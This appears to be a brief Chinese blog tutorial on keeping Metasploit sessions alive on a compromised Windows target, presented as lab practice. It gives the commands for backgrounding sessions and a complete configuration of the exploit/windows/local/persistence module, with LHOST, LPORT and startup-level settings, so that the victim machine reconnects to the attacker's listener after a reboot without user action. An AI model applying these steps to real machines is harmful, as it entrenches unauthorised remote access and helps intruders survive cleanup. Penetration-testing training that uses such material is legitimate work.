浅谈MSF会话持久化！

在上篇文章中，我们讲到了基于msf的免杀操作。在实践过程中，你会发现当靶场运行目标得到会话后，却做不到持久维持会话，因为，本文为你带来全新姿势。

方式一 让会话后台运行

利用-j参数，可让会话请求在后台运行。如

run -j 
exploit -j

当得到会话请求后，我们可以利用sessions -l命令查看当前会话ID

进入当前id

sessions -i 1

离开当前会话，让其在后台自己运行。

 background

但是，当前方式仅支持设备在没有关机的情况下。让设备关机后，还是无法连接。而msf是提供了最新的持久化模块。

方式二 持久化模块

首先，后台化当前meterpreter会话

 background

完整示例如下：

use exploit/windows/local/persistence #使用持久化模块
set SESSION 1 #设置会话id
set LHOST 192.168.50.36
set LPORT 4444
set STARTUP USER
set DELAY 10
exploit

权限要求：

• STARTUP USER - 需要用户级别权限
• STARTUP SYSTEM - 需要管理员权限

测试

直接关闭当前msf终端，重新打开终端并配置参数。在不运行靶场shell文件的情况下，会自动获得会话。

更多精彩文章 欢迎关注我们